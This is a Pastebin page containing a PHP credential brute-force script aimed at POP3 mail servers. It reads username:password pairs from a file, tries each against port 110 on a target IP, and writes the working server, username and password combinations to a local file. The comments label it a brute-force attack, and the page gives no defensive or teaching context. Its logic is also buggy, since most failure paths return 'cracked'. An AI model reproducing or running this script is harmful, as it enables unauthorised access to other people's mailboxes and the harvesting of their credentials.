Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- error_reporting(0);
- function POPa($username, $password, $server) {
- $socket = fsockopen($server, 110); // POP3 port
- if (!$socket) {
- return "cracked";
- }
- $res = fgets($socket, 512); // read +OK
- if (substr(trim($res), 0, 3) != "+OK") {
- return "cracked"; // return the error
- }
- fputs($socket, "USER $username\r\n"); // send user
- $res = fgets($socket, 512); // read +OK
- if (substr(trim($res), 0, 3) != "+OK") {
- return "cracked";
- }
- fputs($socket, "PASS $password\r\n"); // send pass
- $res = fgets($socket, 512); // read +OK
- if (substr(trim($res), 0, 3) != "+OK") {
- return $res;
- }
- fputs($socket, "QUIT\r\n"); // quit
- fclose($socket);
- $fp = fopen("vuln.asl", "a");
- $infosmtp=$server.",".$username.",".$password."\n\n";
- fwrite($fp,$infosmtp);
- fclose($fp);
- return "cracked";
- }
- //SET INITIAL LOAD
- $ip = $argv[1];
- //READ USER/PASS FILE
- $fp = fopen("pass_file", "r");
- $i = 1;
- $c2= 1;
- while (!feof($fp)) {
- $propozitie = fgets($fp, 4096);
- $propozitie = explode(":", $propozitie);
- $domaine = preg_match('/[^.]+\.[^.]+$/', gethostbyaddr($ip), $matches);
- echo "domain name is: {$matches[0]}\n";
- $user[$i] = $propozitie[0]."@".$matches[0];
- @$pass[$i] = $propozitie[1];
- $i = $i + 1;
- $c2 = $c2 + 1;
- }
- fclose($fp);
- //Do BRUTE-FORCE ATACK
- $x = 1;
- $chestie = "not";
- //Do BRUTE-FORCE ATACK
- $x = 1;
- $chestie = "not";
- while (( $x < $c2 ) and ( $chestie != "cracked" )) {
- $chestie = POPa($user[$x], $pass[$x], $ip);
- if ( $chestie == "cracked" ) {
- $quit = 1;
- }
- $x = $x + 1;
- }
- //SET END LOAD
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
